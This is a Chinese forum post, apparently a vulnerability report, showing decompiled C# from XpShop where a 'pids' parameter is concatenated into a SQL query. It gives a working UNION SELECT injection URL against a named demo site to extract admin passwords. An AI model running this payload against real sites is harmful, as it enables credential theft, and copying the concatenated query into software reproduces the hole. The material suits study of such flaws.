找回密码
 注册

QQ登录

只需一步,快速开始


详细说明:
漏洞位置xpshop.webui.Show:
private void GetImg(string pids)
{
ProductDB productDB = new ProductDB();
DataTable thumbnailImg = productDB.GetThumbnailImg(pids);
thumbnailImg.TableName = "Products";
base.Response.Write(XpShopJson.DtToJSON(thumbnailImg));
}

这里是问题函数,我就不写怎么跟进来的,就是page_load,等下直接用payload测试就好了,官网demo的。

跟进去GetThumbnailImg函数:
public DataTable GetThumbnailImg(string pid)
{
string commandText = "SELECT ProductID,ProductName,ThumbnailImg,CategoryID,CategoryNo FROM Product WHERE ProductID = " + pid;
return XpShopDB.ExecuteDataTable(XpShopDB.ConnectionString, CommandType.Text, commandText, null);
}

payload:

[url]http://clothes.xpshop.cn/show.aspx?type=1&action=GetImg&pids=1[/url] union select password,2,3,4,5 from admin--

漏洞证明:

[url]http://clothes.xpshop.cn/show.aspx?type=1&action=GetImg&pids=1[/url] union select password,2,3,4,5 from admin--


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
分享至 : QQ空间
收藏

0 个回复

您需要登录后才可以回帖 登录 | 注册